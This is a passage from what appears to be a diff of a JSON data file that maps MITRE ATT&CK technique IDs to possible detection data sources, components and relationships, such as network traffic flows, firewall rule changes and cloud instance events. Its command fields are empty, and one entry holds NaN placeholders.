endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1564.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + 
"host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + null + ] + }, + { + "technique_id": "T1562.007", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "firewall", + 
"definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "added", + "target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "removed", + "target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "modified", + 
"target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall disable", + "description": "A firewall system was disabled.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "firewall" + } + ], + "external_reference": [ + [ + "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + ] + ] + }, + { + "technique_id": "T1480.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one 
thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1059.007", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + 
"collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one 
thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + 
"https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1578.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", + "source_data_element": "user", + "relationship": "attached", + "target_data_element": "disk/volume" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", 
+ "source_data_element": "user", + "relationship": "detached", + "target_data_element": "disk/volume" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", + "source_data_element": "user", + "relationship": "updated", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "ran", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "redeployed", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance stop", + "description": "An instance was stopped.", + "source_data_element": "user", + "relationship": "stopped", + 
"target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance stop", + "description": "An instance was stopped.", + "source_data_element": "user", + "relationship": "powered off", + "target_data_element": "instance" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ] + ] + }, + { + "technique_id": "T1578.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance deletion", + "description": "An instance was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance deletion", + "description": "An instance was deleted.", + "source_data_element": "user", + "relationship": "terminated", + "target_data_element": "instance" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ] + ] + }, + { + "technique_id": "T1578.001", + "command_list": [], + 
"commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot creation", + "description": "A snapshot was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "snapshot" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + ] + ] + }, + { + "technique_id": "T1578.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance creation", + "description": "An instance was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "instance" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ] + ] + }, + { + "technique_id": "T1027.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1573.002", + 
"command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1573.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1574.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + 